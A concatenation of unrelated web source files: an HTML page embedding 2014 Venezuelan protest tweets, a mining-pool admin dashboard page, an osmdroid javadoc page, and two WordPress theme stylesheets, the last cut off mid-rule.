</p>— Oubiña (@AlexOubina) <a href="https://twitter.com/AlexOubina/statuses/451019036034596864">April 1, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A5.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
Me desconecto. Gracias Venezuela. El cambio esta en cada uno de nostros. No nos rindamos. Yo no lo hare!
</p>— Leopoldo López (@leopoldolopez) <a href="https://twitter.com/leopoldolopez/statuses/435808604570914817">February 18, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A6.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
Brutal agresión a jóvenes protestando en <a href="https://twitter.com/search?q=%23Tachira&src=hash">#Tachira</a> <a href="https://twitter.com/search?q=%23Rubio&src=hash">#Rubio</a> <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a> ruedalo q todo mundo vea qué pasa en Venezuela <a href="https://t.co/VwlZjV4Wy1">https://t.co/VwlZjV4Wy1</a> …
</p>— Jorge @yeye6204 (@yeye6204) <a href="https://twitter.com/yeye6204/statuses/456522858479374337">April 16, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A7.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
Increíble que esto este Pasando en <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a> y tu te Calles <a href="https://twitter.com/OEA_oficial">@OEA_oficial</a> Son Cómplices su Organización es un ASCO <a href="http://t.co/NhL6rgc40N">pic.twitter.com/NhL6rgc40N</a>
</p>— LIBERTAD Y JUSTICIA (@vamosrayados11) <a href="https://twitter.com/vamosrayados11/statuses/451058547158044674">April 1, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A8.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
<a href="https://twitter.com/search?q=%23APURE&src=hash">#APURE</a> <a href="https://twitter.com/Guapo78">@Guapo78</a>: Este es el asesino del niño santiago, DE 6 AÑOS EN <a href="https://twitter.com/search?q=%23APURE&src=hash">#APURE</a> <a href="http://t.co/LhCtbXgqrB">pic.twitter.com/LhCtbXgqrB</a>"" <a href="https://twitter.com/search?q=%231a&src=hash">#1a</a> <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a>"
</p>— MaduroFuera (@Isabeldnieves) <a href="https://twitter.com/Isabeldnieves/statuses/451060568414105600">April 1, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A9.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
"<a href="https://twitter.com/deliab16">@deliab16</a>: "<a href="https://twitter.com/televisiontotal">@televisiontotal</a> <a href="https://twitter.com/Gemj1879">@Gemj1879</a> <a href="https://twitter.com/search?q=%2321A&src=hash">#21A</a> 6:10pm Distribuidor <a href="https://twitter.com/search?q=%23SantaFe&src=hash">#SantaFe</a> <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a> <a href="https://twitter.com/search?q=%23Caracas&src=hash">#Caracas</a> <a href="http://t.co/70SOgAZQkb">pic.twitter.com/70SOgAZQkb</a> Vía <a href="https://twitter.com/MarceloNolla">@MarceloNolla</a>"
</p>— Luis José (@luisjose56) <a href="https://twitter.com/luisjose56/statuses/458377861208891392">April 21, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A10.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
Represión de la PNB en el Distribuidor Santa Fe 3:42pm <a href="https://twitter.com/fdelrinconCNN">@fdelrinconCNN</a> <a href="https://twitter.com/NTN24ve">@NTN24ve</a> <a href="https://twitter.com/CNNEE">@CNNEE</a> <a href="https://twitter.com/search?q=%2321A&src=hash">#21A</a> <a href="https://twitter.com/search?q=%23Caracas&src=hash">#Caracas</a> <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a> <a href="http://t.co/p4CArC0wH8">http://t.co/p4CArC0wH8</a>
</p>— #ResistenciaZuliana (@Resiste_Zulia) <a href="https://twitter.com/Resiste_Zulia/statuses/458348370571321345">April 21, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A11.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
<a href="http://t.co/xliqsCkxbW">http://t.co/xliqsCkxbW</a> ustedes ponganle nombre <a href="https://twitter.com/RCTV_CONTIGO">@RCTV_CONTIGO</a> <a href="https://twitter.com/maracuchos">@maracuchos</a> <a href="https://twitter.com/iTachirenses">@iTachirenses</a> <a href="https://twitter.com/search?q=%23valencia&src=hash">#valencia</a> <a href="https://twitter.com/search?q=%23maracay&src=hash">#maracay</a> <a href="https://twitter.com/search?q=%23venezuela&src=hash">#venezuela</a> <a href="https://twitter.com/search?q=%231AConMariaCorina&src=hash">#1AConMariaCorina</a>
</p>— Dionys Fuentes (@dionnysf_21) <a href="https://twitter.com/dionnysf_21/statuses/451057687976222720">April 1, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A12.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
HOY terroristas de la Oposición de <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a> quemaron mezcladora de cemento en sector El Trigal , estado Carabobo <a href="http://t.co/EB8U9QVe8M">pic.twitter.com/EB8U9QVe8M</a>
</p>— Javier Alexander (@RoaJavier) <a href="https://twitter.com/RoaJavier/statuses/458365394734960640">April 21, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A13.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
NO HAY MEDICINAS, COMIDA, PRODUCTOS DE ASEO, REPUESTOS... PERO LLEGAN TANQUES DE GUERRA RUSOS <a href="http://t.co/M7cX3q0Rg2">pic.twitter.com/M7cX3q0Rg2</a> <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a>
</p>— Noticias Venezuela (@NoticiasVenezue) <a href="https://twitter.com/NoticiasVenezue/statuses/459429622426656769">April 24, 2014</a>
</blockquote>
</div>
</div>
<div class="row">
<div class="col-sm-2 col-sm-offset-1">
<h1>
A14.
</h1>
</div>
<div class="col-sm-8">
<blockquote class="twitter-tweet" lang="en">
<p>
I stand with the people of <a href="https://twitter.com/search?q=%23Venezuela&src=hash">#Venezuela</a> <a href="https://twitter.com/search?q=%23PJNET&src=hash">#PJNET</a> <a href="https://twitter.com/search?q=%23tcot&src=hash">#tcot</a> <a href="https://twitter.com/search?q=%23tgdn&src=hash">#tgdn</a> <a href="https://twitter.com/search?q=%23ccot&src=hash">#ccot</a> <a href="https://twitter.com/search?q=%23ctot&src=hash">#ctot</a> <a href="https://twitter.com/search?q=%23ORPUW&src=hash">#ORPUW</a> <a href="https://twitter.com/search?q=%23RedNationRising&src=hash">#RedNationRising</a> <a href="https://twitter.com/search?q=%23teaparty&src=hash">#teaparty</a> <a href="http://t.co/SnUhYc1wf2">pic.twitter.com/SnUhYc1wf2</a>
</p>— atomiktiger #bossy (@atomiktiger) <a href="https://twitter.com/atomiktiger/statuses/456502715770609665">April 16, 2014</a>
</blockquote>
</div>
</div><script async="" src="http://platform.twitter.com/widgets.js" charset="utf-8" type="text/javascript"></script>
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script>
</body>
</html> |
website-sample/admin.html | clintar/cryptonote-universal-pool | <!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title></title>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery-timeago/1.4.0/jquery.timeago.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/handlebars.js/1.3.0/handlebars.min.js"></script>
<link href="//netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet">
<script src="//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script>
<link href="//netdna.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css" rel="stylesheet">
<link href="custom.css" rel="stylesheet">
<script src="custom.js"></script>
<style>
#statsHolder {
margin-bottom: 0;
}
.luckGood {
color: #03a678;
}
.luckBad {
color: #e66b6b;
}
body {
padding-top: 65px;
padding-bottom: 80px;
overflow-y: scroll;
}
.navbar {
font-size: 1.2em;
}
.layout {
position: relative;
}
#loading {
font-size: 2em;
position: absolute;
width: 100%;
text-align: center;
top: 10%;
}
footer {
position: fixed;
bottom: 0;
width: 100%;
background-color: #f5f5f5;
}
footer > div {
margin: 10px auto;
text-align: center;
}
</style>
<script src="config.js"></script>
<script>
lastStats = {};
$(function() {
$.get(api + '/stats', function(data) {
lastStats = data;
routePage();
});
});
var docCookies = {
getItem: function(sKey) {
return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" + encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) || null;
},
setItem: function(sKey, sValue, vEnd, sPath, sDomain, bSecure) {
if(!sKey || /^(?:expires|max\-age|path|domain|secure)$/i.test(sKey)) {
return false;
}
var sExpires = "";
if(vEnd) {
switch(vEnd.constructor) {
case Number:
sExpires = vEnd === Infinity ? "; expires=Fri, 31 Dec 9999 23:59:59 GMT" : "; max-age=" + vEnd;
break;
case String:
sExpires = "; expires=" + vEnd;
break;
case Date:
sExpires = "; expires=" + vEnd.toUTCString();
break;
}
}
document.cookie = encodeURIComponent(sKey) + "=" + encodeURIComponent(sValue) + sExpires + (sDomain ? "; domain=" + sDomain : "") + (sPath ? "; path=" + sPath : "") + (bSecure ? "; secure" : "");
return true;
},
removeItem: function(sKey, sPath, sDomain) {
if(!sKey || !this.hasItem(sKey)) {
return false;
}
document.cookie = encodeURIComponent(sKey) + "=; expires=Thu, 01 Jan 1970 00:00:00 GMT" + ( sDomain ? "; domain=" + sDomain : "") + ( sPath ? "; path=" + sPath : "");
return true;
},
hasItem: function(sKey) {
return (new RegExp("(?:^|;\\s*)" + encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=")).test(document.cookie);
}
};
function getReadableCoins(coins) {
return (parseInt(coins || 0) / lastStats.config.coinUnits).toFixed(lastStats.config.coinUnits.toString().length - 1);
}
function getReadableHashRateString(hashrate) {
hashrate = hashrate || 0;
var i = 0;
var byteUnits = [' H', ' KH', ' MH', ' GH', ' TH', ' PH' ];
while(hashrate > 1000) {
hashrate = hashrate / 1000;
i++;
}
return hashrate.toFixed(2) + byteUnits[i];
}
window.onhashchange = function() {
routePage();
};
function fetchLiveStats() {
$.ajax({
url: api + '/live_stats',
dataType: 'json',
cache: 'false'
}).done(function(data) {
//pulseLiveUpdate();
//lastStats = data;
//updateIndex();
if(currentPage.update) {
currentPage.update();
}
}).always(function() {
fetchLiveStats();
});
}
// init Handlebars template
function renderTemplate(usersData, templateId, view) {
var source = $(templateId).html(),
template = Handlebars.compile(source),
context = usersData,
html = template(context);
$(view).html(html);
}
function sortTable() {
var table = $(this).parents('table').eq(0),
rows = table.find('tr:gt(0)').toArray().sort(comparer($(this).index()));
this.asc = !this.asc;
if(!this.asc) {
rows = rows.reverse()
}
for(var i = 0; i < rows.length; i++) {
table.append(rows[i])
}
}
function comparer(index) {
return function(a, b) {
var valA = getCellValue(a, index), valB = getCellValue(b, index);
return $.isNumeric(valA) && $.isNumeric(valB) ? valA - valB : valA.toString().localeCompare(valB)
}
}
function getCellValue(row, index) {
return $(row).children('td').eq(index).data("sort")
}
var currentPage;
var xhrPageLoading;
function routePage(loadedCallback) {
if(currentPage && currentPage.destroy) {
currentPage.destroy();
}
$('#page').html('');
$('#loading').show();
if(xhrPageLoading) {
xhrPageLoading.abort();
}
$('.hot_link').removeClass('active');
var $link = $('a.hot_link[href="' + (window.location.hash || '#') + '"]');
$link.addClass('active');
var page = $link.data('page');
xhrPageLoading = $.ajax({
url: 'pages/' + page,
cache: false,
success: function(data) {
$('#loading').hide();
$('#page').show().html(data);
currentPage && currentPage.update && currentPage.update();
if(loadedCallback) {
loadedCallback();
}
}
});
}
</script>
</head>
<body>
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">Admin Center</a>
</div>
<div class="collapse navbar-collapse">
<!-- <div class="navbar-form navbar-right">
<a href="" class="btn btn-primary"><i class="fa fa-sign-out"></i> Sign out</a>
</div> -->
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-sm-3">
<div class="list-group">
<a data-page="admin/statistics.html" href="#" class="list-group-item hot_link active"> <i class="fa fa-bar-chart-o"></i> Statistics </a> <a data-page="admin/monitoring.html" href="#monitoring" class="hot_link list-group-item"> <i class="fa fa-eye"></i> Monitoring </a> <a data-page="admin/userslist.html" href="#users_list" class=" hot_link list-group-item"> <i class="fa fa-users"></i> Users List </a>
</div>
</div>
<div class="col-sm-9 layout">
<p id="loading" class="text-center"><i class="fa fa-circle-o-notch fa-spin"></i></p>
<div id="page"></div>
</div>
</div>
</div>
</body>
</html>
|
docs/osmdroid-android-docs-3.0.4/org/osmdroid/views/overlay/class-use/IOverlayMenuProvider.html | kruzel/citypark-android | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_20) on Tue May 10 21:21:15 CEST 2011 -->
<TITLE>
Uses of Interface org.osmdroid.views.overlay.IOverlayMenuProvider (osmdroid API)
</TITLE>
<META NAME="date" CONTENT="2011-05-10">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Interface org.osmdroid.views.overlay.IOverlayMenuProvider (osmdroid API)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/osmdroid/views/overlay/IOverlayMenuProvider.html" title="interface in org.osmdroid.views.overlay"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html?org/osmdroid/views/overlay/\class-useIOverlayMenuProvider.html" target="_top"><B>FRAMES</B></A>
<A HREF="IOverlayMenuProvider.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Interface<br>org.osmdroid.views.overlay.IOverlayMenuProvider</B></H2>
</CENTER>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
Packages that use <A HREF="../../../../../org/osmdroid/views/overlay/IOverlayMenuProvider.html" title="interface in org.osmdroid.views.overlay">IOverlayMenuProvider</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><A HREF="#org.osmdroid.views.overlay"><B>org.osmdroid.views.overlay</B></A></TD>
<TD> </TD>
</TR>
</TABLE>
<P>
<A NAME="org.osmdroid.views.overlay"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
Uses of <A HREF="../../../../../org/osmdroid/views/overlay/IOverlayMenuProvider.html" title="interface in org.osmdroid.views.overlay">IOverlayMenuProvider</A> in <A HREF="../../../../../org/osmdroid/views/overlay/package-summary.html">org.osmdroid.views.overlay</A></FONT></TH>
</TR>
</TABLE>
<P>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left" COLSPAN="2">Classes in <A HREF="../../../../../org/osmdroid/views/overlay/package-summary.html">org.osmdroid.views.overlay</A> that implement <A HREF="../../../../../org/osmdroid/views/overlay/IOverlayMenuProvider.html" title="interface in org.osmdroid.views.overlay">IOverlayMenuProvider</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> class</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/osmdroid/views/overlay/MinimapOverlay.html" title="class in org.osmdroid.views.overlay">MinimapOverlay</A></B></CODE>
<BR>
Draws a mini-map as an overlay layer.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> class</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/osmdroid/views/overlay/MyLocationOverlay.html" title="class in org.osmdroid.views.overlay">MyLocationOverlay</A></B></CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> class</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/osmdroid/views/overlay/TilesOverlay.html" title="class in org.osmdroid.views.overlay">TilesOverlay</A></B></CODE>
<BR>
These objects are the principle consumer of map tiles.</TD>
</TR>
</TABLE>
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/osmdroid/views/overlay/IOverlayMenuProvider.html" title="interface in org.osmdroid.views.overlay"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html?org/osmdroid/views/overlay/\class-useIOverlayMenuProvider.html" target="_top"><B>FRAMES</B></A>
<A HREF="IOverlayMenuProvider.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
inc/theme-options.css | Zeaksblog/twenty-plus-lite | div.options-box {margin:1em 0 1.5em 0; padding:9px 10px 9px 50px; border-width:1px 0 1px 0; border-style:solid;color:#555;text-shadow:none;}
.options-box.note { border-color:#efe3ae; background:#fef6d2 url(images/note.png) no-repeat 20px 45%; }
#wpcontent select option {
padding-right: 5px;
}
.image-radio-option td {
padding-top: 15px;
}
.image-radio-option label {
display: block;
float: left;
margin: 0 30px 20px 2px;
position: relative;
}
.image-radio-option input {
margin: 0 0 10px;
}
.image-radio-option span {
display: block;
width: 136px;
}
.image-radio-option img {
margin: 0 0 0 -2px;
}
/*.color-scheme.image-radio-option img{ padding: 2px; border:4px solid #E7E8E8;}
.color-scheme.image-radio-option img:hover { border-color: #E0E0E0; }*/
.theme-layout.image-radio-option span { width: 116px;}
.theme-layout.image-radio-option img { border: 4px solid #e7e8e8; }
.theme-layout.image-radio-option img:hover { border-color: #E0E0E0;}
#link-color-example {
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
border: 1px solid #dfdfdf;
margin: 0 7px 0 3px;
padding: 4px 14px;
}
body.rtl .image-radio-option label {
float: right;
margin: 0 2px 20px 30px;
}
|
wp-content/themes/designlab/css/typography.css | traviswall/designlab-wordpress | /* ----------------------------------------
Travis Wall digital
-------------------------------------------
typography.css
everything concerning typography
-------------------------------------------
v1.0
12.02.13
-------------------------------------------
revision history:
------------- v1.1 - 12.02.13 -------------
------------------------------------------- */
/* ---------------- paragraphs ---------------- */
p {
margin-top:0px;
margin-bottom:0px;
font-size: 1.3em;
font-family: "klavika-web-n4","klavika-web",sans-serif;
font-style: normal;
font-weight: normal;
line-height:1.4em;
color:rgba(26,26,26,1);
-webkit-font-smoothing: subpixel-antialiased;
}
p+p {
margin-top:1em;
}
p img {
margin-left:-26px;
}
.portfolio-image {
margin-left:0px;
}
em {
font-family: "klavika-web-i4","klavika-web",sans-serif;
font-style: italic;
font-weight: 400;
}
sup {
font-family: "klavika-web-n4","klavika-web",sans-serif;
font-style: normal;
font-weight: 400;
font-size: 0.8em;
line-height:0px;
}
.alignleft {
font-size:1em;
text-indent:0px;
}
.aligncenter {
margin-top:0px !important;
}
.wp-caption {
margin-top:0%;
margin-bottom:1.9em;
font-size: 1em;
color:rgba(128,128,128,1);
}
.wp-caption-dd {
margin-top:1.2em;
margin-bottom:1.2em;
font-size:1em;
text-indent:0px;
margin-left:26px;
margin-right:26px;
}
.work-meta-text {
width:64.0625%;
margin-top:0px;
margin-bottom:0px;
float:left;
font-size: 0.85em;
line-height:1.75em;
margin-left:3.125%;
overflow: hidden;
}
p.social-button-caption {
margin-top:2px;
margin-bottom:0px;
font-size: 0.9em;
line-height:1.3em;
}
/* ---------------- headers ---------------- */
h1, h2, h3, h4, h5, h6, h7, h8 {
-webkit-font-smoothing: antialiased;
margin-top:0px;
margin-bottom:0px;
font-family: "klavika-web-n7","klavika-web",sans-serif;
font-style: normal;
font-weight: 700;
}
h1 {
font-size: 1.1em;
text-transform:uppercase !important;
margin-top:35px;
text-align:center;
font-family: "klavika-web-n4","klavika-web",sans-serif !important;
font-style: normal !important;
font-weight: normal !important;
color:rgba(26,26,26,1) !important;
-webkit-font-smoothing: subpixel-antialiased;
}
h1.about {
margin-left:-37px;
}
h1.contact {
margin-left:-35px;
}
h1.category {
font-family: "klavika-web-n7","klavika-web",sans-serif !important;
font-style: normal !important;
font-weight: 700 !important;
margin-left:none !important;
text-align:center;
}
h2 {
font-size: 1.1em;
color:rgba(26,26,26,1);
text-transform:uppercase;
margin-top:36px;
margin-left:21px;
float:left;
}
.nav-hover {
color:rgba(26,26,26,1);
}
h3 {
font-size: 2.0em;
color:rgba(26,26,26,1);
margin-bottom:15px;
overflow: hidden;
margin-left:3.125%;
width:64.0625%;
}
h4 {
font-size: 1.8em;
font-style: normal !important;
font-weight: 400 !important;
color:rgba(26,26,26,1);
margin-bottom:2.7439024390243905%;
overflow: hidden;
}
h5 {
width:80%;
font-size: 1.15em;
line-height:1.3em;
padding:6px 0px 2px 0px;
margin-bottom:16px;
color:rgba(26,26,26,1);
float:left;
}
h6 {
font-size: 1.2em;
margin-top:1em;
margin-bottom:1em;
}
.open {
display:block !important;
}
#dhtmltooltip{
font-size: 64px;
font-family: "klavika-web-n7","klavika-web",sans-serif;
font-style: normal;
font-weight: 700;
color:rgba(256,256,256,1);
}
/* ---------------- links ---------------- */
a {
color:rgba(26,26,26,1);
text-decoration:none;
border-bottom: 1px solid rgba(26, 26, 26, 1);
-webkit-transition:background-color 0.05s ease-in;
-moz-transition:background-color 0.05s ease-in;
-o-transition:background-color 0.05s ease-in;
transition:background-color 0.05s ease-in;
}
a:hover {
background-color:rgba(0, 0, 0, 0.05);
}
h1 a:link, h2 a:link, h3 a:link, h4 a:link, h5 a:link, h6 a:link, h7 a:link, h8 a:link {
text-decoration:none;
border-bottom: none;
}
h1 a:link, h1 a:visited {
color:rgba(26,26,26,1);
}
h1 a:link, h1 a:hover {
background-color:rgba(0, 0, 0, 0);
}
h2 a:link, h2 a:visited {
color:rgba(102,102,102,1);
}
/* ---- social ---- */
a.social {
font-size: 1.2em;
font-family: "klavika-web-n7","klavika-web",sans-serif;
font-style: normal;
font-weight: 700;
padding-top:10px;
border-bottom: none;
}
a.social:link {
text-decoration:none;
}
a.social:visited {
text-decoration:none;
}
a.social:hover {
text-decoration:underline;
background:none;
}
a.social:active {
text-decoration:underline;
}
/* ---- meta links ---- */
li.related a, span.tags a {
font-size:0.8em;
font-family: "klavika-web-n4","klavika-web",sans-serif;
font-style: normal;
font-weight: 400;
border-bottom: none;
}
/* related */
li.related a:link {
text-decoration:none;
}
li.related a:visited {
text-decoration:none;
}
li.related a:hover {
text-decoration:none;
border-bottom: 1px solid rgba(26, 26, 26, 1);
background:none;
}
li.related a:active {
text-decoration:none;
}
/* tags */
.date, .date-work {
font-size: 0.8em;
